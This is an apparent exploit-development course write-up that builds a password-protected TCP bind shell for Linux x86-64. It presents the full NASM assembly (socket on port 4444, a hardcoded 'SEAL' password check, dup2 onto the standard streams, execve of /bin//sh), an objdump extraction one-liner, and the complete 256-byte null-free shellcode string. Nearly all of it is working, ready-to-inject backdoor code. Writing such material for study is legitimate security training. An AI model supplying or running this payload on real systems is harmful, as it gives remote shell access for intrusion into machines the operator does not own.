Shell Bind TCP port
Requirements:
*Bind to a port
*Needs a password
*If password correct execs a shell
*Remove 0x00
Repository: https://github.com/Farad77/pentestAssign1.git
So for this first assignment, the idea was to add an authentication system to a TCP bind shell.
Socket initialisation
We will create a server socket listening on port 4444, and when a client connects we will jump to the authentication part of the code.
;-----------------------------------------------------------------------
; Socket setup (Linux x86-64, raw syscalls, NASM-style Intel syntax).
; socket() -> bind(0.0.0.0:4444) -> listen() -> accept(), then jump to
; the password check. Every register is cleared with xor and loaded
; through its low byte so that no 0x00 appears in the encoding.
;-----------------------------------------------------------------------
;socket(AF_INET=2, SOCK_STREAM=1, 0) -- syscall 41
xor rax,rax
add al,41 ;rax = 41 (socket)
xor rsi,rsi
add sil,1 ;rsi = SOCK_STREAM
xor rdi,rdi
add dil,2 ;rdi = AF_INET
xor rdx,rdx ;rdx = protocol 0
syscall
mov rdi,rax ;rdi = listening socket fd; reused as first arg by bind/listen/accept below
xor rax,rax
push rax ;8 zero bytes: the sin_zero padding of the struct
;bind needs a 16-byte struct sockaddr_in, built here below rsp:
;  +0 sin_family = AF_INET (2)
;  +2 sin_port   = 4444 in network byte order
;  +4 sin_addr   = INADDR_ANY (0)
;  +8 sin_zero   = 8 bytes of 0 (the push above)
mov dword [rsp-04],eax ;sin_addr = 0 (eax is still 0)
mov word [rsp-6],0x5c11 ;stored little-endian as bytes 11 5c = htons(4444)
xor rax,rax
inc rax
inc rax ;rax = 2 (AF_INET) without emitting a null byte
mov word [rsp-8],ax ;sin_family = AF_INET
sub rsp,8 ;rsp now points at the start of the 16-byte struct
;bind(sockfd, &sockaddr_in, 16) -- syscall 49
xor rax,rax
add al,49
mov rsi,rsp ;rsi = &sockaddr_in
xor rdx,rdx
add dl,16 ;rdx = sizeof(struct sockaddr_in)
syscall ;port 4444 is now bound
;listen(sockfd, backlog) -- syscall 50
;rdi still holds the socket fd: syscall only clobbers rax, rcx and r11
xor rax,rax
add al,50
xor rsi,rsi
add sil,2 ;backlog = 2
syscall ;listen
;accept(sockfd, &addr, &addrlen) -- syscall 43
xor rax,rax
add al,43 ;syscall number
sub rsp,16 ;16-byte scratch area that receives the peer address
mov rsi,rsp ;rsi = &addr
mov byte [rsp-1],16 ;addrlen = 16 -- only the low byte of the 4-byte socklen_t is written; its other three bytes are whatever already sits at [rsp..rsp+2]
dec rsp
mov rdx,rsp ;rdx = &addrlen
syscall ;blocks until a client connects; rax = client fd
mov r9,rax ;keep the client fd in r9 (nothing between here and auth_ok writes r9)
jmp waitForPassword
Null bytes were taken care of by xoring the register and then adding values to its low byte, converting `mov rax,43` into `xor rax,rax` / `add al,43`.
The next part is authentication. The idea is to create a 5-byte buffer, read the first bytes from the incoming socket and compare them to our hardcoded password: SEAL.
;;;; jmp/call/pop: waitForPassword does `call getBufferAddr`, so the return
;;;; address popped here is the address of the `pass` bytes placed right after
;;;; that call. Those bytes serve as the read buffer.
getBufferAddr:
pop rsi ;rsi = &pass (the read buffer)
mov rdi,rax ;rdi = client fd: rax still holds accept's return value, nothing on the path accept -> jmp -> call -> here writes rax
xor rax,rax ;rax = 0 (read)
xor rdx,rdx
add dl,40 ;rdx = 40, i.e. read(client, pass, 40); pass is only 5 bytes long, so anything longer is written over whatever follows pass in memory (the bytes at pass must therefore be writable)
syscall ;read from socket; the return value (byte count, 0 on EOF, negative on error) is not checked
cmp dword [rsi],0x4c414553 ;first 4 bytes == "SEAL" (bytes 53 45 41 4c)? -- the password is a plaintext literal, present verbatim in the payload and on the wire, so it is a static indicator
je auth_ok
;wrong password: exit(0) -- syscall 60
xor rax, rax;exit
add rax, 60
xor rdi, rdi ;exit status 0
syscall
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry of the authentication stage (target of the jmp after accept).
waitForPassword:
call getBufferAddr ;pushes the address of `pass` as the return address; getBufferAddr pops it into rsi
pass db "AAAAB" ;5-byte placeholder buffer overwritten by read(); the expected value "SEAL" is checked in getBufferAddr
If the password is incorrect, we exit. The next step is to duplicate STDIN, STDOUT and STDERR onto the socket and execve /bin/sh.
;-----------------------------------------------------------------------
; Launch_CommandProc: execve(path, {path, NULL}, {NULL})
; In:  rbx = the 8 bytes of the path ("/bin//sh"), pushed as-is
; Builds the NUL-terminated string, argv and envp on the stack.
; The trailing ret is only reached if execve fails; at that point [rsp]
; holds argv[0] (a pointer to the string), not a return address.
;-----------------------------------------------------------------------
Launch_CommandProc: ;rbx = command string (8 bytes)
xor rax,rax
push rax ;8 zero bytes: terminator of the string pushed next
mov rdx,rsp ;rdx = envp, pointing at a NULL entry (empty environment)
push rbx ;the 8 path bytes, now followed by the zero qword
mov rdi ,rsp ;rdi = pathname
push rax ;argv[1] = NULL
push rdi ;argv[0] = pathname
mov rsi,rsp ;rsi = argv
add al,59 ;rax = 59 (execve); al was 0
syscall
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;PASSWORD IS OK: GET THE SHELL
auth_ok:
;duplicate the client socket onto stdin/stdout/stderr with dup2 -- syscall 33
;dup2(client, 0)
mov rdi,r9 ;rdi = client fd saved after accept; syscall leaves rdi intact, so it stays valid for all four calls below
xor rax,rax
add al,33 ;dup2
xor rsi,rsi ;newfd = 0
syscall
;dup2(client, 1)
xor rax,rax
add al,33
xor rsi,rsi
add sil,1 ;newfd = 1
syscall
;dup2(client, 2)
xor rax,rax
add al,33
xor rsi,rsi
add sil,2 ;newfd = 2
syscall
xor rax,rax ;close(client) -- syscall 3, rdi is still r9; fds 0-2 keep the connection, while the listening socket is never closed and is inherited by the shell
add al,3
syscall
;execve /bin//sh through Launch_CommandProc
;0x68732f2f6e69622f is "/bin//sh" little-endian; the doubled slash pads the path to 8 bytes without a 0x00
mov rbx, 0x68732f2f6e69622f
call Launch_CommandProc
Here we go: we use objdump to verify that we have no null bytes, with
# Take the instruction bytes column of the disassembly, strip spaces/newlines and print them as one \x-escaped string
echo "\"$(objdump -d BindShell64.o | grep '[0-9a-f]:' | cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\""
This gives us our shellcode as bytes:
"\xeb\x54\x48\x31\xc0\x50\x48\x89\xe2\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x04\x3b\x0f\x05\xc3\x4c\x89\xcf\x48\x31\xc0\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x01\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\x04\x03\x0f\x05\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\xe8\xac\xff\xff\xff\xeb\x2d\x5e\x48\x89\xc7\x48\x31\xc0\x48\x31\xd2\x80\xc2\x28\x0f\x05\x81\x3e\x53\x45\x41\x4c\x74\xa8\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd8\xff\xff\xff\x41\x41\x41\x41\x42\x48\x31\xc0\x04\x29\x48\x31\xf6\x40\x80\xc6\x01\x48\x31\xff\x40\x80\xc7\x02\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\x48\x31\xc0\x48\xff\xc0\x48\xff\xc0\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x31\xc0\x04\x31\x48\x89\xe6\x48\x31\xd2\x80\xc2\x10\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\x04\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\xff\xcc\x48\x89\xe2\x0f\x05\x49\x89\xc1\xe9\x7b\xff\xff\xff"
Passing it to our skeleton shellcode.c: the shellcode is 256 bytes, has no null bytes, binds to port 4444 and needs a password to get the shell.